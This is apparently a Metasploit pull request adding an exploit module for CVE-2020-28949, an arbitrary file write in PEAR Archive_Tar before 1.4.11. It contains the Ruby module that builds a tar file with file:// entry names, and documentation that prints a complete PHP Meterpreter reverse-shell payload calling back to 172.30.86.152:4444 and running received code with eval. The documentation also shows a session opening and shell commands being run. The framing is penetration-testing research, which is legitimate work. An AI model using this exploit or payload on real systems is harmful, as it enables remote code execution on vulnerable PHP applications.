### PR TITLE
Add exploit for CVE-2020-28949: Archive_Tar PEAR plugin arbitrary file write

### DIFF
--- a/documentation/modules/exploit/multi/fileformat/archive_tar_arb_file_write.md
+++ b/documentation/modules/exploit/multi/fileformat/archive_tar_arb_file_write.md
@@ -100,23 +100,23 @@ Then copy the file over and into the expanded copy of https://github.com/pear/Ar
 and run vulnerable.php to simulate an application opening a tar file and extracting its contents.
 
 ```
- ~/drupal/exploit/file_poc  ls                                                                                     ✔ │ 2.6.6 Ruby
+ ~/drupal/exploit/file_poc #  ls
 create_tar.py  exploit.tar  input_file.txt  php_errors.log  steps.sh  vulnerable.php
- ~/drupal/exploit/file_poc  rm -rf exploit.tar                                                                     ✔ │ 2.6.6 Ruby
- ~/drupal/exploit/file_poc  cp /home/test/.msf4/local/test.tar exploit.tar                                     ✔ │ 2.6.6 Ruby
- ~/drupal/exploit/file_poc  ls -alh /tmp/test.php                                                                  ✔ │ 2.6.6 Ruby
+ ~/drupal/exploit/file_poc #  rm -rf exploit.tar
+ ~/drupal/exploit/file_poc #  cp /home/test/.msf4/local/test.tar exploit.tar
+ ~/drupal/exploit/file_poc # ls -alh /tmp/test.php
 ls: cannot access '/tmp/test.php': No such file or directory
- ~/drupal/exploit/file_poc  php vulnerable.php                                                                   2 х │ 2.6.6 Ruby
- ~/drupal/exploit/file_poc  cat vulnerable.php                                                                     ✔ │ 2.6.6 Ruby
+ ~/drupal/exploit/file_poc # php vulnerable.php
+ ~/drupal/exploit/file_poc # cat vulnerable.php
 <?php
 
   require_once('../Archive/Tar.php');
 
   $archive = new Archive_Tar('exploit.tar');
   $archive->extract();
- ~/drupal/exploit/file_poc  ls -alh /tmp/test.php                                                                  ✔ │ 2.6.6 Ruby
+ ~/drupal/exploit/file_poc  ls -alh /tmp/test.php
 -rw-rw-r-- 1 test test 1.1K Jan 15 17:54 /tmp/test.php
- ~/drupal/exploit/file_poc  cat /tmp/test.php                                                                      ✔ │ 2.6.6 Ruby
+ ~/drupal/exploit/file_poc # cat /tmp/test.php
 /*<?php /**/ error_reporting(0); $ip = '172.30.86.152'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
 ```
 

--- a/documentation/modules/exploit/multi/fileformat/archive_tar_arb_file_write.md
+++ b/documentation/modules/exploit/multi/fileformat/archive_tar_arb_file_write.md
@@ -1,0 +1,149 @@
+## Description
+
+    This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file
+    stream wrappers contained within filenames to write an arbitrary file containing
+    user controlled content to an arbitrary file on disk. Note that the file will be
+    written to disk with the permissions of the user that PHP is running as, so it may
+    not be possible to overwrite some files if the PHP user is not appropriately
+    privileged.
+
+
+## Vulnerable Application
+
+  [Archive_Tar](https://github.com/pear/Archive_Tar/) is a plugin for the
+  [PEAR PHP development framework](https://pear.php.net/) that allows developers
+  the ability to create, delete, modify and extract files from TAR archives.
+
+
+## Verification Steps
+
+1. **Install** the PEAR framework using the instructions at https://pear.php.net/manual/en/installation.getting.php
+1. **Verify** the PEAR framework is working using the instructions at https://pear.php.net/manual/en/installation.checking.php
+1. **Download** the PoC files from the original advisory at https://github.com/pear/Archive_Tar/files/5551831/exploit.zip.
+1. **Unzip** the files to a sample directory
+1. Open up `msfconsole`.
+1. `use exploit/multi/fileformat/archive_tar_arb_file_write`
+1. `set FILENAME exploit.tar`
+1. `set FILEPATH *path to the file to overwrite on the target system*`
+1. `run`
+1. **Copy** the generated `exploit.tar` file to the `file_proc` directory within the directory you expanded `exploit.zip` to from earlier.
+1. **Run** `php vulnerable.php`
+1. **Verify** that the file was created in the location you specified in the `FILEPATH` parameter, with the contents of the PHP shell that you specified for the `PAYLOAD` parameter.
+
+
+## Options
+
+  **FILENAME**
+  The name of the TAR file to be created locally
+
+  **FILEPATH**
+  The full path to the file on the target system that should be
+  created or overwritten with the code for a PHP shell.
+
+
+## Scenarios
+
+### Archive_Tar v1.4.10
+
+First create the malicious TAR file and set up the listener:
+
+```
+msf6 > use exploit/multi/fileformat/archive_tar_arb_file_write
+[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
+msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > show options
+
+Module options (exploit/multi/fileformat/archive_tar_arb_file_write):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   FILENAME                   no        The file name.
+   FILEPATH  /tmp/msf.php     yes       The full path to the file to write on the target.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.30.86.152    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+   **DisablePayloadHandler: True   (no handler will be created!)**
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Archive_Tar < 1.4.11
+
+
+msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > set FILENAME test.tar
+FILENAME => test.tar
+msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > set FILEPATH /tmp/test.php
+FILEPATH => /tmp/test.php
+msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > run
+
+[*] Writing file: test.tar (3072 bytes) ...
+[+] test.tar stored at /home/test/.msf4/local/test.tar
+msf6 exploit(multi/fileformat/archive_tar_arb_file_write) > use multi/handler
+[*] Using configured payload generic/shell_reverse_tcp
+msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
+payload => php/meterpreter/reverse_tcp
+msf6 exploit(multi/handler) > set LHOST 172.30.86.152
+LHOST => 172.30.86.152
+msf6 exploit(multi/handler) > set LPORT 4444
+LPORT => 4444
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 172.30.86.152:4444
+```
+
+Then copy the file over and into the expanded copy of https://github.com/pear/Archive_Tar/files/5551831/exploit.zip
+and run vulnerable.php to simulate an application opening a tar file and extracting its contents.
+
+```
+ ~/drupal/exploit/file_poc  ls                                                                                     ✔ │ 2.6.6 Ruby
+create_tar.py  exploit.tar  input_file.txt  php_errors.log  steps.sh  vulnerable.php
+ ~/drupal/exploit/file_poc  rm -rf exploit.tar                                                                     ✔ │ 2.6.6 Ruby
+ ~/drupal/exploit/file_poc  cp /home/test/.msf4/local/test.tar exploit.tar                                     ✔ │ 2.6.6 Ruby
+ ~/drupal/exploit/file_poc  ls -alh /tmp/test.php                                                                  ✔ │ 2.6.6 Ruby
+ls: cannot access '/tmp/test.php': No such file or directory
+ ~/drupal/exploit/file_poc  php vulnerable.php                                                                   2 х │ 2.6.6 Ruby
+ ~/drupal/exploit/file_poc  cat vulnerable.php                                                                     ✔ │ 2.6.6 Ruby
+<?php
+
+  require_once('../Archive/Tar.php');
+
+  $archive = new Archive_Tar('exploit.tar');
+  $archive->extract();
+ ~/drupal/exploit/file_poc  ls -alh /tmp/test.php                                                                  ✔ │ 2.6.6 Ruby
+-rw-rw-r-- 1 test test 1.1K Jan 15 17:54 /tmp/test.php
+ ~/drupal/exploit/file_poc  cat /tmp/test.php                                                                      ✔ │ 2.6.6 Ruby
+/*<?php /**/ error_reporting(0); $ip = '172.30.86.152'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();
+```
+
+Now we just have to run the PHP file to simulate a user browsing to the web page:
+
+```
+php /tmp/test.php
+```
+
+And the shell will be obtained:
+
+```
+msf6 exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 172.30.86.152:4444
+[*] Sending stage (39282 bytes) to 172.30.86.152
+[*] Meterpreter session 2 opened (172.30.86.152:4444 -> 172.30.86.152:56754) at 2021-01-15 18:02:55 -0600
+
+meterpreter > getuid
+Server username: test (1000)
+meterpreter > uname -a
+[-] Unknown command: uname.
+meterpreter > shell
+Process 29349 created.
+Channel 0 created.
+uname -a
+Linux test-Virtual-Machine 5.8.0-36-generic #40~20.04.1-Ubuntu SMP Wed Jan 6 10:15:55 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
+```

--- a/documentation/modules/exploit/multi/fileformat/archive_tar_arb_file_write.md
+++ b/documentation/modules/exploit/multi/fileformat/archive_tar_arb_file_write.md
@@ -1,18 +1,15 @@
-## Description
-
-    This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file
-    stream wrappers contained within filenames to write an arbitrary file containing
-    user controlled content to an arbitrary file on disk. Note that the file will be
-    written to disk with the permissions of the user that PHP is running as, so it may
-    not be possible to overwrite some files if the PHP user is not appropriately
-    privileged.
-
-
 ## Vulnerable Application
 
-  [Archive_Tar](https://github.com/pear/Archive_Tar/) is a plugin for the
-  [PEAR PHP development framework](https://pear.php.net/) that allows developers
-  the ability to create, delete, modify and extract files from TAR archives.
+[Archive_Tar](https://github.com/pear/Archive_Tar/) is a plugin for the
+[PEAR PHP development framework](https://pear.php.net/) that allows developers
+the ability to create, delete, modify and extract files from TAR archives.
+
+This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file
+stream wrappers contained within filenames to write an arbitrary file containing
+user controlled content to an arbitrary file on disk. Note that the file will be
+written to disk with the permissions of the user that PHP is running as, so it may
+not be possible to overwrite some files if the PHP user is not appropriately
+privileged.
 
 
 ## Verification Steps
@@ -28,17 +25,18 @@
 1. `run`
 1. **Copy** the generated `exploit.tar` file to the `file_proc` directory within the directory you expanded `exploit.zip` to from earlier.
 1. **Run** `php vulnerable.php`
-1. **Verify** that the file was created in the location you specified in the `FILEPATH` parameter, with the contents of the PHP shell that you specified for the `PAYLOAD` parameter.
+1. **Verify** that the file was created in the location you specified in the `FILEPATH` parameter,
+with the contents of the PHP shell that you specified for the `PAYLOAD` parameter.
 
 
 ## Options
 
-  **FILENAME**
-  The name of the TAR file to be created locally
+### FILENAME
+The name of the TAR file to be created locally
 
-  **FILEPATH**
-  The full path to the file on the target system that should be
-  created or overwritten with the code for a PHP shell.
+### FILEPATH
+The full path to the file on the target system that should be
+created or overwritten with the code for a PHP shell.
 
 
 ## Scenarios

--- a/modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb
+++ b/modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb
@@ -10,42 +10,45 @@ class MetasploitModule < Msf::Exploit::Remote
 
   include Msf::Exploit::FILEFORMAT
 
-  def initialize(info={})
-    super(update_info(info,
-      'Name'           => "PEAR Archive_Tar < 1.4.11 Arbitary File Write",
-      'Description'    => %q{
-        This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file stream wrappers contained
-        within filenames to write an arbitrary file containing user controlled content to an arbitrary file
-        on disk. Note that the file will be written to disk with the permissions of the user that PHP is
-        running as, so it may not be possible to overwrite some files if the PHP user is not appropriately
-        privileged.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'gwillcox-r7', # Metasploit module
-          'xorathustra', # Original advisory and PoC
-        ],
-      'References'     =>
-        [
-          ['URL', 'https://github.com/pear/Archive_Tar/issues/33'],
-          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949'],
-          ['CVE', '2020-28949']
-        ],
-      'DefaultOptions'  =>
-        {
-          'EXITFUNC' => 'thread',
-          'DisablePayloadHandler' => true
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'PEAR Archive_Tar < 1.4.11 Arbitary File Write',
+        'Description' => %q{
+          This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file stream wrappers contained
+          within filenames to write an arbitrary file containing user controlled content to an arbitrary file
+          on disk. Note that the file will be written to disk with the permissions of the user that PHP is
+          running as, so it may not be possible to overwrite some files if the PHP user is not appropriately
+          privileged.
         },
-      'Platform' => ['php'],
-      'Arch' => ARCH_PHP,
-      'Targets'        =>
-        [
-          ['Archive_Tar < 1.4.11', {}]
-        ],
-      'Privileged'     => false,
-      'DisclosureDate' => '2020-11-17'
-    ))
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'gwillcox-r7', # Metasploit module
+            'xorathustra', # Original advisory and PoC
+          ],
+        'References' =>
+          [
+            ['URL', 'https://github.com/pear/Archive_Tar/issues/33'],
+            ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949'],
+            ['CVE', '2020-28949']
+          ],
+        'DefaultOptions' =>
+          {
+            'EXITFUNC' => 'thread',
+            'DisablePayloadHandler' => true
+          },
+        'Platform' => ['php'],
+        'Arch' => ARCH_PHP,
+        'Targets' =>
+          [
+            ['Archive_Tar < 1.4.11', {}]
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-11-17'
+      )
+    )
 
     register_options([
       OptString.new('FILEPATH', [true, 'The full path to the file to write on the target.', '/tmp/msf.php'])
@@ -53,17 +56,17 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-     # Create malicious tar archive
-     tarfile = StringIO.new
-     Rex::Tar::Writer.new tarfile do |tar|
-       tar.add_file "file://#{datastore['FILEPATH']}", 0644 do |io|
-         io.write payload.encoded
-       end
-     end
-     tarfile.rewind
-     cbt = tarfile.read
+    # Create malicious tar archive
+    tarfile = StringIO.new
+    Rex::Tar::Writer.new tarfile do |tar|
+      tar.add_file "file://#{datastore['FILEPATH']}", 0o644 do |io|
+        io.write payload.encoded
+      end
+    end
+    tarfile.rewind
+    cbt = tarfile.read
 
-     print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
-     file_create cbt
+    print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
+    file_create cbt
   end
 end

--- a/modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb
+++ b/modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(update_info(info,
       'Name'           => "PEAR Archive_Tar < 1.4.11 Arbitary File Write",
       'Description'    => %q{
-        This module takes advantages of Archive_Tar's lack of validation of file stream wrappers contained
+        This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file stream wrappers contained
         within filenames to write an arbitrary file containing user controlled content to an arbitrary file
         on disk. Note that the file will be written to disk with the permissions of the user that PHP is
         running as, so it may not be possible to overwrite some files if the PHP user is not appropriately
@@ -48,7 +48,7 @@ class MetasploitModule < Msf::Exploit::Remote
     ))
 
     register_options([
-      OptString.new('FILEPATH', [true, 'The full path to the file to write on the target, including the file name.', '/var/www/msf.php'])
+      OptString.new('FILEPATH', [true, 'The full path to the file to write on the target.', '/tmp/msf.php'])
     ])
   end
 

--- a/modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb
+++ b/modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb
@@ -1,0 +1,69 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'rex/tar'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::FILEFORMAT
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "PEAR Archive_Tar < 1.4.11 Arbitary File Write",
+      'Description'    => %q{
+        This module takes advantages of Archive_Tar's lack of validation of file stream wrappers contained
+        within filenames to write an arbitrary file containing user controlled content to an arbitrary file
+        on disk. Note that the file will be written to disk with the permissions of the user that PHP is
+        running as, so it may not be possible to overwrite some files if the PHP user is not appropriately
+        privileged.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'gwillcox-r7', # Metasploit module
+          'xorathustra', # Original advisory and PoC
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://github.com/pear/Archive_Tar/issues/33'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28949'],
+          ['CVE', '2020-28949']
+        ],
+      'DefaultOptions'  =>
+        {
+          'EXITFUNC' => 'thread',
+          'DisablePayloadHandler' => true
+        },
+      'Platform' => ['php'],
+      'Arch' => ARCH_PHP,
+      'Targets'        =>
+        [
+          ['Archive_Tar < 1.4.11', {}]
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => '2020-11-17'
+    ))
+
+    register_options([
+      OptString.new('FILEPATH', [true, 'The full path to the file to write on the target, including the file name.', '/var/www/msf.php'])
+    ])
+  end
+
+  def exploit
+     # Create malicious tar archive
+     tarfile = StringIO.new
+     Rex::Tar::Writer.new tarfile do |tar|
+       tar.add_file "file://#{datastore['FILEPATH']}", 0644 do |io|
+         io.write payload.encoded
+       end
+     end
+     tarfile.rewind
+     cbt = tarfile.read
+
+     print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
+     file_create cbt
+  end
+end

--- a/modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb
+++ b/modules/exploits/multi/fileformat/archive_tar_arb_file_write.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'PEAR Archive_Tar < 1.4.11 Arbitary File Write',
+        'Name' => 'PEAR Archive_Tar < 1.4.11 Arbitrary File Write',
         'Description' => %q{
           This module takes advantages of Archive_Tar < 1.4.11's lack of validation of file stream wrappers contained
           within filenames to write an arbitrary file containing user controlled content to an arbitrary file
@@ -64,9 +64,9 @@ class MetasploitModule < Msf::Exploit::Remote
       end
     end
     tarfile.rewind
-    cbt = tarfile.read
+    file_buffer = tarfile.read
 
-    print_status "Writing file: #{datastore['FILENAME']} (#{cbt.length} bytes) ..."
-    file_create cbt
+    print_status "Writing file: #{datastore['FILENAME']} (#{file_buffer.length} bytes) ..."
+    file_create file_buffer
   end
 end


### PR DESCRIPTION
Fixes #14567. Only adds support for CVE-2020-28949 though as I couldn't get CVE-2020-28948 to work in a more useful manner and of the two, CVE-2020-28949 seemed to be easier to exploit and more useful in general given some of the limitations I later found when looking into CVE-2020-28948.

CVE-2020-28949 is a vulnerability within the Archive_Tar plugin of the PEAR PHP development framework. Versions prior to 1.4.11 are affected, as they do not appropriately validate the names of files within a TAR archive to ensure that the file names do not start with the name of a file stream wrapper. The various wrappers PHP supports can be found at https://www.php.net/manual/en/wrappers.php. 

By using the file:// wrapper one can ensure that once the TAR file is expanded and its contents extracted using the Archive_Tar plugin, the file of their choice will be overwritten/created with the contents of their choice. The file write operation will occur as the user PHP is running as.

Researching this showed that older versions of Drupal were affected by this vulnerability however the issue remains the same in that an app must both have a vulnerable version of the Archive_Tar plugin installed and also use it to extract user created TAR files for it to be vulnerable.

For this reason there are some extra setup steps, listed below in the Verification section.

## Verification

List the steps needed to make sure this thing works
- [ ] Install the PEAR framework using the instructions at https://pear.php.net/manual/en/installation.getting.php
- [ ] Verify the PEAR framework is working using the instructions at https://pear.php.net/manual/en/installation.checking.php
- [ ] Download the PoC files from the original advisory at https://github.com/pear/Archive_Tar/files/5551831/exploit.zip.
- [ ] Unzip the files to a sample directory
- [ ] Start `msfconsole`
- [ ] `use exploit/multi/fileformat/archive_tar_arb_file_write`
- [ ] `set FILENAME *name of local tar file to create*`
- [ ] `set FILEPATH *path to the file to overwrite on the target system*`
- [ ] `run`
- [ ] Copy the generated `exploit.tar` file to the `file_proc` directory within the directory you expanded `exploit.zip` to from earlier.
- [ ] Run `php vulnerable.php`
- [ ] Verify that the file was created in the location you specified in the `FILEPATH` parameter, with the contents of the PHP shell that you specified for the `PAYLOAD` parameter.
- [ ] **Verify** that after running Archive_Tar using the steps described above, that the file specified in the `FILEPATH` parameter is created with the PHP payload you specified in Metasploit.
